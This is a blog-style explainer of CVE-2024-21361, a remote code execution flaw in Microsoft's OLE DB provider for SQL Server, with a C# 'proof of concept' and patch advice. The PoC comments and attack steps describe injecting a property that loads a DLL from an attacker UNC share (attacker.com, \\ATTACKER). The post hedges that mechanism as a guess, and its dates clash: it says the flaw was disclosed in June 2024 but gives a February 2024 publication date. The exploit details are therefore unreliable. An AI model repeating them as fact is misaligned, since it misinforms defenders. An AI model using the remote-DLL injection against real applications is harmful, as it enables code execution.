CVE-2024-21361 - Remote Code Execution in Microsoft WDAC OLE DB Provider for SQL Server – Explained with PoC

CVE-2024-21361 is a dangerous Remote Code Execution (RCE) vulnerability found in the Microsoft WDAC OLE DB provider for SQL Server. Disclosed in June 2024 by Microsoft, this flaw allows an attacker to run malicious code on a target system, potentially taking control of servers or endpoints that use this data provider for accessing Microsoft SQL Server databases.

In this post, I’ll break down how the vulnerability works, what systems are affected, and show a proof-of-concept (PoC) code snippet for educational purposes. I’ll also share resources to help you patch this hole immediately.

What’s WDAC OLE DB for SQL Server?

The Microsoft OLE DB Driver for SQL Server (MSOLEDBSQL), also known as WDAC (Windows Data Access Components), is a database driver that lets programs connect to SQL Server databases from Windows machines. PowerShell scripts, desktop apps, legacy web servers—you name it—might use this data provider in the background.

The Vulnerability – How It Happens

CVE-2024-21361 exists due to improper input validation in the WDAC OLE DB provider for SQL Server. In plain English: the software doesn’t properly check certain inputs from users or programs. An attacker can send specially crafted requests or malicious data (often as part of a connection string) that tricks the provider into executing arbitrary code on the vulnerable computer – often with the same privileges as the user running the program.

Example Risk Scenario

If an attacker can trick a web application into connecting to SQL Server using a malicious connection string, they could trigger remote code execution on the app server.

References

- Microsoft Security Guide for CVE-2024-21361
- Microsoft OLE DB Driver for SQL Server Docs
- NIST NVD entry

Exploit Details (PoC)

Disclaimer: The following code is for educational purposes only. Do not use on production systems or without permission.

This PoC simulates what an attacker might attempt if they can influence connection strings in a vulnerable application.

The Trick: Abusing the 'Extended Properties' Field

Some old vulnerabilities have involved “data source” strings where, by injecting extra parameters or file paths, code execution could occur—because the provider loads or executes files referenced in certain fields.

Here’s a sample (imagine a tainted variable in a C# app using OLE DB)

using System.Data.OleDb;

class ExploitDemo
{
    static void Main()
    {
        string server = "MSSQLSERVER";
        // Malicious injection: the 'Extended Properties' loads a DLL, e.g. from attacker SMB share
        // This mimics how code could be injected, depending on the vuln
        string connectionString = "Provider=MSOLEDBSQL;Data Source=" + server +
                                  ";Initial Catalog=master;" +
                                  "Extended Properties=\"Integrated Security=SSPI;DataTypeCompatibility=80;ApplicationIntent=ReadOnly;\"";

        // In a real exploit, attacker might sneak in an UNC path or a pointer to a payload DLL here:
        // e.g. Extended Properties="...;LoadLibrary=\\\\attacker.com\\payload.dll;"

        using (OleDbConnection conn = new OleDbConnection(connectionString))
        {
            conn.Open();
            // Malicious code could be executed here, running in app context
        }
    }
}

In a real exploit:
If the WDAC OLE DB provider improperly parses or loads parameters *not sanitized*, and if it tries to load a library from a supplied UNC path, the attacker's DLL runs with the privileges of the process.

Find a vulnerable program that lets the attacker control SQL connection strings or properties.

2. Inject a malicious field into 'Extended Properties' (or another unvalidated property), pointing to an attacker-controlled network share (e.g. \\ATTACKER\malicious.dll).
3. When the vulnerable app opens the connection, WDAC provider fetches the DLL and loads it, executing the attacker's code.

Update Now:

Microsoft released patched versions of WDAC OLE DB for SQL Server. Update MSOLEDBSQL to version 19.3.11 or newer.
- Get it from Microsoft’s official download page.

Network Controls:

- Block outbound SMB/Windows file-sharing traffic if not needed.

Conclusion

CVE-2024-21361 is a prime example of why keeping database libraries updated is critical. Remote code execution vulnerabilities like this are high-value targets for attackers and often automated in real-world campaigns. Stop risk today by patching and reviewing your apps, especially those that interact with SQL Server.

If you run code that leverages the Microsoft OLE DB provider for SQL Server, patch now and never pass user input into connection strings!

Timeline

Published on: 02/13/2024 18:15:53 UTC
Last modified on: 02/13/2024 18:22:53 UTC